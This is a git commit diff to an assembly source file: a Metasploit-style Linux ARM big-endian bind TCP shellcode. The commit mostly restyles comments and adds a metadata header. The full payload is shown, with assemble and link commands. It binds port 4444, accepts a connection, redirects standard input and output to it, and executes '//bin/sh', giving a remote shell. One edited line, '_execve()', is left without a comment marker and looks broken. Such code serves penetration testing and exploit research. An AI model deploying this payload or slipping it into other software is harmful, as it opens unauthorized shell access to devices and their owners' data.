armeb comments modified
EarthQuake
parent
26680f58ca
commit
3147553d4f
|
|
@ -1,11 +1,30 @@
|
|||
/*
|
||||
Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
|
||||
Balazs Bucsay
|
||||
@xoreipeip | earthquake <at@> rycon <do.t> hu
|
||||
http://rycon.hu
|
||||
port = 4444
|
||||
ip = 0.0.0.0
|
||||
*/
|
||||
@@
|
||||
@
|
||||
@ Name: single_sock_bind
|
||||
@ Qualities: -
|
||||
@ Authors: Balazs Bucsay <@xoreipeip>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux bind TCP shellcode for ARM BE architecture.
|
||||
@
|
||||
@ Assemble with:
|
||||
@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o
|
||||
@ Link with:
|
||||
@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Bind TCP
|
||||
@ meta-description=Listen on a port for a connection and run a second stage
|
||||
@ meta-authors=earthquake
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armbe
|
||||
@ meta-category=singles
|
||||
@ meta-connection-type=bind
|
||||
@ meta-name=bind_tcp
|
||||
@@
|
||||
|
||||
|
||||
.section .text
|
||||
.global _start
|
||||
|
|
@ -13,12 +32,12 @@ ip = 0.0.0.0
|
|||
_start:
|
||||
.code 32
|
||||
|
||||
# Thumb-Mode on
|
||||
@ Thumb-Mode on
|
||||
add r6, pc, #1
|
||||
bx r6
|
||||
.code 16
|
||||
|
||||
# _socket(2,1,0)
|
||||
@ _socket(2,1,0)
|
||||
sub r2, r2, r2
|
||||
add r1, r2, #1
|
||||
add r0, r2, #2
|
||||
|
|
@ -27,16 +46,14 @@ ip = 0.0.0.0
|
|||
svc 1
|
||||
mov r6, r0
|
||||
|
||||
/*
|
||||
1 uint8_t sin_len
|
||||
1 sa_family_t sin_family
|
||||
2 in_port_t sin_port
|
||||
4 struct in_addr sin_addr
|
||||
8 char sin_zero [8]
|
||||
00 02 5C11 00000000 00000000 00000000
|
||||
5c11 => 4444
|
||||
*/
|
||||
# _bind()
|
||||
@ 1 uint8_t sin_len
|
||||
@ 1 sa_family_t sin_family
|
||||
@ 2 in_port_t sin_port
|
||||
@ 4 struct in_addr sin_addr
|
||||
@ 8 char sin_zero [8]
|
||||
@ 00 02 5C11 00000000 00000000 00000000
|
||||
@ 5c11 => 4444
|
||||
@ _bind()
|
||||
mov r2, #2
|
||||
lsl r2, r2, #8
|
||||
add r2, r2, #0x11
|
||||
|
|
@ -52,20 +69,20 @@ ip = 0.0.0.0
|
|||
add r7, r7, #1
|
||||
svc 1
|
||||
|
||||
# _listen()
|
||||
@ _listen()
|
||||
mov r0, r6
|
||||
sub r1, r1, r1
|
||||
add r7, r7, #2
|
||||
svc 1
|
||||
|
||||
# _accept()
|
||||
@ _accept()
|
||||
mov r0, r6
|
||||
sub r2, r2, r2
|
||||
add r7, r7, #1
|
||||
svc 1
|
||||
mov r6, r0
|
||||
|
||||
# _dup2()
|
||||
@ _dup2()
|
||||
sub r1, r1, r1
|
||||
mov r7, #63
|
||||
svc 1
|
||||
|
|
@ -78,23 +95,23 @@ ip = 0.0.0.0
|
|||
add r1, r1, #1
|
||||
svc 1
|
||||
|
||||
# _execve()
|
||||
_execve()
|
||||
sub r2, r2, r2
|
||||
mov r0, pc
|
||||
add r0, #18
|
||||
// next intstruction terminates the string beneath the code "//bin/sh"
|
||||
// in case you want to say goodbye to the null character
|
||||
// str r2, [r0, #8]
|
||||
@ next intstruction terminates the string beneath the code "//bin/sh"
|
||||
@ in case you want to say goodbye to the null character
|
||||
@ str r2, [r0, #8]
|
||||
str r2, [sp, #8]
|
||||
str r0, [sp, #4]
|
||||
add r1, sp, #4
|
||||
mov r7, #11
|
||||
svc 1
|
||||
|
||||
# _exit()
|
||||
@ _exit()
|
||||
sub r4, r4, r4
|
||||
mov r0, r4
|
||||
mov r7, #1
|
||||
svc 1
|
||||
.ascii "//bin/sh\0"
|
||||
//.ascii "//bin/sh"
|
||||
@.ascii "//bin/sh"
|
||||
|
|
|
|||
Loading…
Reference in New Issue